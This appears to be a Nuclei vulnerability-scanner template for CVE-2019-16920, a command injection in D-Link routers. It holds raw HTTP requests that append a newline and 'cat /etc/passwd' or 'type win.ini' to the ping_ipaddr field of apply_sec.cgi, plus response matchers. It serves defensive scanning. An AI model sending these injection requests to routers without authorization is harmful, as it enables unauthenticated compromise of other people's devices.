id: CVE-2019-16920 info: name: D-Link Routers - Remote Code Execution author: dwisiswant0 severity: critical description: D-Link products such as DIR-655C, DIR-866L, DIR-652, and DHP-1565 contain an unauthenticated remote code execution vulnerability. The issue occurs when the attacker sends an arbitrary input to a "PingTest" device common gateway interface that could lead to common injection. An attacker who successfully triggers the command injection could achieve full system compromise. Later, it was independently found that these issues also affected; DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835, and DIR-825. reference: - https://nvd.nist.gov/vuln/detail/CVE-2019-16920 - https://github.com/pwnhacker0x18/CVE-2019-16920-MassPwn3r - https://fortiguard.com/zeroday/FG-VD-19-117 - https://www.seebug.org/vuldb/ssvid-98079 - https://medium.com/@80vul/determine-the-device-model-affected-by-cve-2019-16920-by-zoomeye-bf6fec7f9bb3 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2019-16920 cwe-id: CWE-78 epss-score: 0.96885 tags: cve,cve2019,dlink,rce,router,unauth,kev metadata: max-request: 3 http: - raw: - | POST /apply_sec.cgi HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded Referer: {{BaseURL}} html_response_page=login_pic.asp&login_name=YWRtaW4%3D&log_pass=&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=62384 - | POST /apply_sec.cgi HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded Referer: {{BaseURL}}/login_pic.asp Cookie: uid=1234123 html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0a{{url_encode('cat /etc/passwd')}} - | POST /apply_sec.cgi HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded Referer: {{BaseURL}}/login_pic.asp Cookie: uid=1234123 html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0a{{url_encode('type C:\\Windows\\win.ini')}} matchers-condition: and matchers: - type: regex part: body regex: - "root:.*:0:0:" - "\\[(font|extension|file)s\\]" condition: or - type: status status: - 200 # Enhanced by mp on 2022/05/16